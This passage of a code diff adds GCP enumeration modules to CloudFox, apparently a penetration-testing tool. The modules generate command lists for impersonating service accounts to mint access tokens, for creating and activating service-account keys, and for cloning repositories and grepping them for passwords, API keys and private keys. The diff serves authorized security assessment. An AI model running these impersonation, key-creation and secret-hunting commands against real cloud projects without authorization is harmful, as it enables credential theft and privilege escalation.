b/gcp/commands/serviceaccounts.go new file mode 100644 index 00000000..4c853211 --- /dev/null +++ b/gcp/commands/serviceaccounts.go @@ -0,0 +1,582 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPServiceAccountsCommand = &cobra.Command{ + Use: globals.GCP_SERVICEACCOUNTS_MODULE_NAME, + Aliases: []string{"sa", "sas", "service-accounts"}, + Short: "Enumerate GCP service accounts with security analysis", + Long: `Enumerate GCP service accounts with 
detailed security analysis. + +Features: +- Lists all service accounts with metadata +- Analyzes user-managed keys (age, expiration) +- Identifies default service accounts (Compute, App Engine, etc.) +- Detects disabled service accounts +- Flags service accounts without key rotation +- Identifies impersonation opportunities`, + Run: runGCPServiceAccountsCommand, +} + +// ServiceAccountAnalysis extends ServiceAccountInfo with security analysis +type ServiceAccountAnalysis struct { + IAMService.ServiceAccountInfo + IsDefaultSA bool + DefaultSAType string // "compute", "appengine", "cloudbuild", etc. + OldestKeyAge int // Days + HasExpiredKeys bool + HasOldKeys bool // Keys older than 90 days + // Pentest: Impersonation analysis + ImpersonationInfo *IAMService.SAImpersonationInfo +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type ServiceAccountsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + ServiceAccounts []ServiceAccountAnalysis + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type ServiceAccountsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ServiceAccountsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ServiceAccountsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPServiceAccountsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &ServiceAccountsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ServiceAccounts: 
[]ServiceAccountAnalysis{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ServiceAccountsModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEACCOUNTS_MODULE_NAME, m.processProject) + + // Check results + if len(m.ServiceAccounts) == 0 { + logger.InfoM("No service accounts found", globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + return + } + + // Count findings + withKeys := 0 + defaultSAs := 0 + impersonatable := 0 + for _, sa := range m.ServiceAccounts { + if sa.HasKeys { + withKeys++ + } + if sa.IsDefaultSA { + defaultSAs++ + } + if sa.ImpersonationInfo != nil && (len(sa.ImpersonationInfo.TokenCreators) > 0 || len(sa.ImpersonationInfo.KeyCreators) > 0) { + impersonatable++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d service account(s) (%d with keys, %d default, %d impersonatable)", + len(m.ServiceAccounts), withKeys, defaultSAs, impersonatable), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *ServiceAccountsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating service accounts in project: %s", projectID), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } + + // Create service and fetch service accounts with impersonation analysis + iamService := IAMService.New() + serviceAccounts, err := iamService.ServiceAccountsWithImpersonation(projectID) + if err != nil { + // Fallback to basic enumeration if 
impersonation analysis fails + serviceAccounts, err = iamService.ServiceAccounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SERVICEACCOUNTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate service accounts in project %s", projectID)) + return + } + } + + // Get impersonation info for each SA + impersonationMap := make(map[string]*IAMService.SAImpersonationInfo) + impersonationInfos, err := iamService.GetAllServiceAccountImpersonation(projectID) + if err == nil { + for i := range impersonationInfos { + impersonationMap[impersonationInfos[i].ServiceAccount] = &impersonationInfos[i] + } + } + + // Analyze each service account + var analyzedSAs []ServiceAccountAnalysis + for _, sa := range serviceAccounts { + analyzed := m.analyzeServiceAccount(sa, projectID) + // Attach impersonation info if available + if info, ok := impersonationMap[sa.Email]; ok { + analyzed.ImpersonationInfo = info + } + analyzedSAs = append(analyzedSAs, analyzed) + } + + // Thread-safe append + m.mu.Lock() + m.ServiceAccounts = append(m.ServiceAccounts, analyzedSAs...) 
+ + // Generate loot for each service account + for _, sa := range analyzedSAs { + m.addServiceAccountToLoot(sa, projectID) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service account(s) in project %s", len(analyzedSAs), projectID), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + } +} + +// analyzeServiceAccount performs security analysis on a service account +func (m *ServiceAccountsModule) analyzeServiceAccount(sa IAMService.ServiceAccountInfo, projectID string) ServiceAccountAnalysis { + analyzed := ServiceAccountAnalysis{ + ServiceAccountInfo: sa, + } + + // Check if it's a default service account + analyzed.IsDefaultSA, analyzed.DefaultSAType = isDefaultServiceAccount(sa.Email, projectID) + + // Analyze keys + if len(sa.Keys) > 0 { + now := time.Now() + oldestAge := 0 + + for _, key := range sa.Keys { + if key.KeyType == "USER_MANAGED" { + // Calculate key age + keyAge := int(now.Sub(key.ValidAfter).Hours() / 24) + if keyAge > oldestAge { + oldestAge = keyAge + } + + // Check for expired keys + if !key.ValidBefore.IsZero() && now.After(key.ValidBefore) { + analyzed.HasExpiredKeys = true + } + + // Check for old keys (> 90 days) + if keyAge > 90 { + analyzed.HasOldKeys = true + } + } + } + + analyzed.OldestKeyAge = oldestAge + } + + return analyzed +} + +// isDefaultServiceAccount checks if a service account is a GCP default service account +func isDefaultServiceAccount(email, projectID string) (bool, string) { + // Compute Engine default service account + if strings.HasSuffix(email, "-compute@developer.gserviceaccount.com") { + return true, "Compute Engine" + } + + // App Engine default service account + if strings.HasSuffix(email, "@appspot.gserviceaccount.com") { + return true, "App Engine" + } + + // Cloud Build service account + if strings.Contains(email, "@cloudbuild.gserviceaccount.com") { + return true, "Cloud Build" + } + + // Cloud Functions service account 
(project-id@appspot.gserviceaccount.com) + if email == fmt.Sprintf("%s@appspot.gserviceaccount.com", projectID) { + return true, "App Engine/Functions" + } + + // Dataflow service account + if strings.Contains(email, "-compute@developer.gserviceaccount.com") { + // This is also used by Dataflow + return true, "Compute/Dataflow" + } + + // GKE service account + if strings.Contains(email, "@container-engine-robot.iam.gserviceaccount.com") { + return true, "GKE" + } + + // Cloud SQL service account + if strings.Contains(email, "@gcp-sa-cloud-sql.iam.gserviceaccount.com") { + return true, "Cloud SQL" + } + + // Pub/Sub service account + if strings.Contains(email, "@gcp-sa-pubsub.iam.gserviceaccount.com") { + return true, "Pub/Sub" + } + + // Firebase service accounts + if strings.Contains(email, "@firebase.iam.gserviceaccount.com") { + return true, "Firebase" + } + + // Google APIs service account + if strings.Contains(email, "@cloudservices.gserviceaccount.com") { + return true, "Google APIs" + } + + return false, "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ServiceAccountsModule) initializeLootFiles() { + m.LootMap["serviceaccounts-commands"] = &internal.LootFile{ + Name: "serviceaccounts-commands", + Contents: "# Service Account Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *ServiceAccountsModule) addServiceAccountToLoot(sa ServiceAccountAnalysis, projectID string) { + keyFileName := strings.Split(sa.Email, "@")[0] + + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# SERVICE ACCOUNT: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n"+ + "# Display Name: %s\n"+ + "# Disabled: %v\n", + sa.Email, + projectID, + sa.DisplayName, + sa.Disabled, + ) + + // Add impersonation info if available + if sa.ImpersonationInfo != nil { + if 
len(sa.ImpersonationInfo.TokenCreators) > 0 { + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf("# Token Creators: %s\n", strings.Join(sa.ImpersonationInfo.TokenCreators, ", ")) + } + if len(sa.ImpersonationInfo.KeyCreators) > 0 { + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf("# Key Creators: %s\n", strings.Join(sa.ImpersonationInfo.KeyCreators, ", ")) + } + if len(sa.ImpersonationInfo.ActAsUsers) > 0 { + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf("# ActAs Users: %s\n", strings.Join(sa.ImpersonationInfo.ActAsUsers, ", ")) + } + } + + m.LootMap["serviceaccounts-commands"].Contents += fmt.Sprintf( + "\n# Impersonation commands:\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n"+ + "gcloud auth print-identity-token --impersonate-service-account=%s\n\n"+ + "# Key creation commands:\n"+ + "gcloud iam service-accounts keys create %s-key.json --iam-account=%s --project=%s\n"+ + "gcloud auth activate-service-account --key-file=%s-key.json\n\n"+ + "# Describe service account:\n"+ + "gcloud iam service-accounts describe %s --project=%s\n\n"+ + "# Get IAM policy for this service account:\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n\n", + sa.Email, + sa.Email, + keyFileName, + sa.Email, + projectID, + keyFileName, + sa.Email, + projectID, + sa.Email, + projectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Service accounts table - one row per IAM binding (impersonation permission) + saHeader := []string{ + "Project Name", + "Project ID", + "Email", + "Display Name", + "Disabled", + "Default SA", + "DWD", + "Key Count", + "IAM Role", + "IAM Member", + } + + var saBody [][]string + for _, sa := range m.ServiceAccounts { + disabled := "No" + if sa.Disabled { + disabled = "Yes" + } + + defaultSA := "-" + if sa.IsDefaultSA { + 
defaultSA = sa.DefaultSAType + } + + // Check if DWD is enabled + dwd := "No" + if sa.OAuth2ClientID != "" { + dwd = "Yes" + } + + // Count user-managed keys + keyCount := "-" + userKeyCount := 0 + for _, key := range sa.Keys { + if key.KeyType == "USER_MANAGED" { + userKeyCount++ + } + } + if userKeyCount > 0 { + keyCount = fmt.Sprintf("%d", userKeyCount) + } + + // Build IAM bindings from impersonation info + // One row per IAM binding (member + role type) + hasBindings := false + if sa.ImpersonationInfo != nil { + // Token creators can get access tokens + for _, member := range sa.ImpersonationInfo.TokenCreators { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "TokenCreator", + member, + }) + } + } + // Key creators can create keys + for _, member := range sa.ImpersonationInfo.KeyCreators { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "KeyAdmin", + member, + }) + } + } + // ActAs users can impersonate + for _, member := range sa.ImpersonationInfo.ActAsUsers { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "ActAs", + member, + }) + } + } + // SA Admins have full control + for _, member := range sa.ImpersonationInfo.SAAdmins { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + 
m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "SAAdmin", + member, + }) + } + } + // SignBlob users + for _, member := range sa.ImpersonationInfo.SignBlobUsers { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "SignBlob", + member, + }) + } + } + // SignJwt users + for _, member := range sa.ImpersonationInfo.SignJwtUsers { + email := extractEmailFromMember(member) + if email != sa.Email { // Skip self-reference + hasBindings = true + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "SignJwt", + member, + }) + } + } + } + + // If no IAM bindings, still show the SA with empty IAM columns + if !hasBindings { + saBody = append(saBody, []string{ + m.GetProjectName(sa.ProjectID), + sa.ProjectID, + sa.Email, + sa.DisplayName, + disabled, + defaultSA, + dwd, + keyCount, + "-", + "-", + }) + } + } + + // Collect loot files (only non-empty ones) + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables - just one table now + tables := []internal.TableFile{ + { + Name: "serviceaccounts", + Header: saHeader, + Body: saBody, + }, + } + + output := ServiceAccountsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + 
m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// extractEmailFromMember extracts the email/identity from an IAM member string +// e.g., "user:alice@example.com" -> "alice@example.com" +// e.g., "serviceAccount:sa@project.iam.gserviceaccount.com" -> "sa@project.iam..." +func extractEmailFromMember(member string) string { + if idx := strings.Index(member, ":"); idx != -1 { + return member[idx+1:] + } + return member +} diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go new file mode 100644 index 00000000..f44c6d97 --- /dev/null +++ b/gcp/commands/serviceagents.go @@ -0,0 +1,271 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + serviceagentsservice "github.com/BishopFox/cloudfox/gcp/services/serviceAgentsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPServiceAgentsCommand = &cobra.Command{ + Use: globals.GCP_SERVICEAGENTS_MODULE_NAME, + Aliases: []string{"agents", "service-accounts-google", "gcp-agents"}, + Short: "Enumerate Google-managed service agents", + Long: `Enumerate Google-managed service agents and their permissions. + +Service agents are Google-managed service accounts that operate on behalf +of GCP services. 
Understanding them helps identify: +- Hidden access paths to resources +- Cross-project service agent access +- Overprivileged service agents +- Potential lateral movement via service agent impersonation + +Common Service Agents: +- Cloud Build Service Account (@cloudbuild.gserviceaccount.com) +- Compute Engine Service Agent (@compute-system.iam.gserviceaccount.com) +- GKE Service Agent (@container-engine-robot.iam.gserviceaccount.com) +- Cloud Run/Functions (@serverless-robot-prod.iam.gserviceaccount.com) +- Cloud SQL Service Agent (@gcp-sa-cloud-sql.iam.gserviceaccount.com) + +Security Considerations: +- Service agents often have broad permissions +- Cross-project agents indicate shared service access +- Cloud Build SA is a common privilege escalation vector +- Default compute SA often has Editor role`, + Run: runGCPServiceAgentsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ServiceAgentsModule struct { + gcpinternal.BaseGCPModule + + Agents []serviceagentsservice.ServiceAgentInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ServiceAgentsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ServiceAgentsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ServiceAgentsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPServiceAgentsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SERVICEAGENTS_MODULE_NAME) + if err != nil { + return + } + + module := &ServiceAgentsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Agents: []serviceagentsservice.ServiceAgentInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + 
module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ServiceAgentsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEAGENTS_MODULE_NAME, m.processProject) + + if len(m.Agents) == 0 { + logger.InfoM("No service agents found", globals.GCP_SERVICEAGENTS_MODULE_NAME) + return + } + + // Count cross-project agents + crossProjectCount := 0 + for _, agent := range m.Agents { + if agent.IsCrossProject { + crossProjectCount++ + } + } + + if crossProjectCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d service agent(s) (%d cross-project)", len(m.Agents), crossProjectCount), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d service agent(s)", len(m.Agents)), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *ServiceAgentsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating service agents in project: %s", projectID), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + + svc := serviceagentsservice.New() + agents, err := svc.GetServiceAgents(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting service agents: %v", err), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Agents = append(m.Agents, agents...) 
+ + for _, agent := range agents { + m.addAgentToLoot(agent) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service agent(s) in project %s", len(agents), projectID), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ServiceAgentsModule) initializeLootFiles() { + m.LootMap["serviceagents-commands"] = &internal.LootFile{ + Name: "serviceagents-commands", + Contents: "# Service Agents Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *ServiceAgentsModule) addAgentToLoot(agent serviceagentsservice.ServiceAgentInfo) { + crossProjectNote := "" + if agent.IsCrossProject { + crossProjectNote = " [CROSS-PROJECT]" + } + + m.LootMap["serviceagents-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# SERVICE AGENT: %s%s (Project: %s)\n"+ + "# ==========================================\n"+ + "# Email: %s\n"+ + "# Description: %s\n", + agent.ServiceName, crossProjectNote, agent.ProjectID, + agent.Email, agent.Description, + ) + + if len(agent.Roles) > 0 { + m.LootMap["serviceagents-commands"].Contents += fmt.Sprintf("# Roles: %s\n", strings.Join(agent.Roles, ", ")) + } + + m.LootMap["serviceagents-commands"].Contents += fmt.Sprintf( + "\n# Get IAM policy for project:\n"+ + "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s' --format='table(bindings.role)'\n"+ + "# Test impersonation (requires iam.serviceAccounts.getAccessToken):\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + agent.ProjectID, agent.Email, + agent.Email, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main agents table - one row 
per role + header := []string{ + "Project Name", + "Project ID", + "Service", + "Email", + "Role", + "Cross-Project", + } + + var body [][]string + for _, agent := range m.Agents { + crossProject := "No" + if agent.IsCrossProject { + crossProject = "Yes" + } + + // One row per role + if len(agent.Roles) > 0 { + for _, role := range agent.Roles { + body = append(body, []string{ + m.GetProjectName(agent.ProjectID), + agent.ProjectID, + agent.ServiceName, + agent.Email, + role, + crossProject, + }) + } + } else { + // Agent with no roles + body = append(body, []string{ + m.GetProjectName(agent.ProjectID), + agent.ProjectID, + agent.ServiceName, + agent.Email, + "-", + crossProject, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: globals.GCP_SERVICEAGENTS_MODULE_NAME, + Header: header, + Body: body, + }, + } + + output := ServiceAgentsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SERVICEAGENTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/sourcerepos.go b/gcp/commands/sourcerepos.go new file mode 100644 index 00000000..175b70e1 --- /dev/null +++ b/gcp/commands/sourcerepos.go @@ -0,0 +1,298 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + sourcereposservice "github.com/BishopFox/cloudfox/gcp/services/sourceReposService" + 
"github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSourceReposCommand = &cobra.Command{ + Use: globals.GCP_SOURCEREPOS_MODULE_NAME, + Aliases: []string{"repos", "csr", "git"}, + Short: "Enumerate Cloud Source Repositories", + Long: `Enumerate Cloud Source Repositories for code and secrets. + +Cloud Source Repositories can contain: +- Application source code +- Infrastructure as Code (Terraform, CloudFormation) +- Configuration files with hardcoded credentials +- API keys and secrets in code +- CI/CD pipeline configurations + +Output: +- List of all repositories accessible +- Repository sizes and mirror configurations +- Clone commands for each repository +- Secret search commands + +After cloning, search for: +- Hardcoded credentials and API keys +- Private keys and certificates +- Environment configuration files +- Database connection strings`, + Run: runGCPSourceReposCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SourceReposModule struct { + gcpinternal.BaseGCPModule + + Repos []sourcereposservice.RepoInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SourceReposOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SourceReposOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SourceReposOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSourceReposCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SOURCEREPOS_MODULE_NAME) + if err != nil { + return + } + + module := &SourceReposModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + 
Repos: []sourcereposservice.RepoInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SourceReposModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SOURCEREPOS_MODULE_NAME, m.processProject) + + if len(m.Repos) == 0 { + logger.InfoM("No Cloud Source Repositories found", globals.GCP_SOURCEREPOS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d repository(ies)", len(m.Repos)), globals.GCP_SOURCEREPOS_MODULE_NAME) + logger.InfoM("[PENTEST] Clone repositories and search for secrets!", globals.GCP_SOURCEREPOS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SourceReposModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Source Repositories in project: %s", projectID), globals.GCP_SOURCEREPOS_MODULE_NAME) + } + + svc := sourcereposservice.New() + repos, err := svc.ListRepos(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SOURCEREPOS_MODULE_NAME, + fmt.Sprintf("Could not list repos in project %s", projectID)) + return + } + + m.mu.Lock() + m.Repos = append(m.Repos, repos...) 
+ + for _, repo := range repos { + m.addRepoToLoot(repo) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d repository(ies) in project %s", len(repos), projectID), globals.GCP_SOURCEREPOS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SourceReposModule) initializeLootFiles() { + m.LootMap["sourcerepos-commands"] = &internal.LootFile{ + Name: "sourcerepos-commands", + Contents: "# Cloud Source Repository Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *SourceReposModule) addRepoToLoot(repo sourcereposservice.RepoInfo) { + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# REPOSITORY: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n", + repo.Name, repo.ProjectID, + ) + + if repo.Size > 0 { + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# Size: %d bytes\n", repo.Size) + } + if repo.MirrorConfig { + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# Mirrors: %s\n", repo.MirrorURL) + } + if repo.PubsubConfigs > 0 { + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# Pub/Sub Triggers: %d\n", repo.PubsubConfigs) + } + + // IAM bindings summary + if len(repo.IAMBindings) > 0 { + m.LootMap["sourcerepos-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range repo.IAMBindings { + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + m.LootMap["sourcerepos-commands"].Contents += fmt.Sprintf( + "\n# Clone repository:\n"+ + "gcloud source repos clone %s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud source repos get-iam-policy %s --project=%s\n\n"+ + "# Search for secrets after cloning:\n"+ + "cd %s && grep -rE 
'(password|secret|api[_-]?key|private[_-]?key|AWS_|GOOGLE_|token)' . --include='*'\n"+ + "find . -name '*.pem' -o -name '*.key' -o -name '.env*' -o -name '*credential*' -o -name '*.tfvars'\n"+ + "grep -rE 'BEGIN (RSA |DSA |EC |OPENSSH )?PRIVATE KEY' .\n\n", + repo.Name, repo.ProjectID, + repo.Name, repo.ProjectID, + repo.Name, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Repos table - one row per IAM binding + header := []string{ + "Project Name", + "Project ID", + "Name", + "Size", + "Mirror", + "Mirror URL", + "Triggers", + "IAM Role", + "IAM Member", + } + + var body [][]string + for _, repo := range m.Repos { + sizeDisplay := "-" + if repo.Size > 0 { + if repo.Size > 1024*1024 { + sizeDisplay = fmt.Sprintf("%.1f MB", float64(repo.Size)/(1024*1024)) + } else if repo.Size > 1024 { + sizeDisplay = fmt.Sprintf("%.1f KB", float64(repo.Size)/1024) + } else { + sizeDisplay = fmt.Sprintf("%d B", repo.Size) + } + } + + mirror := "No" + mirrorURL := "-" + if repo.MirrorConfig { + mirror = "Yes" + mirrorURL = repo.MirrorURL + } + + triggers := "-" + if repo.PubsubConfigs > 0 { + triggers = fmt.Sprintf("%d", repo.PubsubConfigs) + } + + // One row per IAM binding + if len(repo.IAMBindings) > 0 { + for _, binding := range repo.IAMBindings { + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repo.ProjectID, + repo.Name, + sizeDisplay, + mirror, + mirrorURL, + triggers, + binding.Role, + binding.Member, + }) + } + } else { + // Repo with no IAM bindings + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repo.ProjectID, + repo.Name, + sizeDisplay, + mirror, + mirrorURL, + triggers, + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with 
